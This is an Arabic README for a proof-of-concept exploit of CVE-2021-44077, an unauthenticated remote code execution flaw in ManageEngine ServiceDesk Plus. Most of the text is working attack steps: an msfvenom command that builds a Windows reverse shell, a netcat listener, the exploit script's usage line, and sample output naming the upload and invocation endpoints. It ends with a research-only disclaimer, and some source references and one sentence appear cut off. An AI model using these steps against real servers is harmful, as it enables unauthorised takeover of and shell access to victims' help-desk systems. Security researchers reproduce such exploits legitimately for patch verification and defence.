
استغلال إثبات المفهوم لـ ManageEngine ServiceDesk Plus CVE-2021-44077
إثبات المفهوم لاستغلال CVE-2021-44077: PreAuth RCE في ManageEngine ServiceDesk Plus < 11306
بناءً على:
نشرة CISA:
الإصلاح (التحديث إلى الإصدار 11306 أو أحدث):
تم الاختبار على ManageEngine ServiceDesk Plus Build 11303. تم تعطيل جميع برامج مكافحة الفيروسات.
يقوم الاستغلال برفع ملف تنفيذي لنظام ويندوز إلى الهدف وتنفيذه.
لاستغلال الثغرة، قم أولاً بتوليد أي ملف تنفيذي. على سبيل المثال:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
قم بتثبيت ملف المتطلبات باستخدام pip install أو تأكد من تثبيت حزمة requests.
إذا كنت تحاول استقبال شل عكسية، قم بتشغيل المستمع أولاً، مثلاً:
nc -l 4444
ثم قم بتشغيل سكريبت الاستغلال، مع تمرير وسيطي url و exe، مثلاً:
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
مثال على إخراج السكريبت:
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

bin، بما في ذلك الملفات الموجودة مثل نصوص الدفعات. قد توجد طرق أخرى لاستدعاء الملف المرفوع.تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس الغرض منه استخدامه لمهاجمة الأنظمة إلا في حالة التصريح بذلك صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.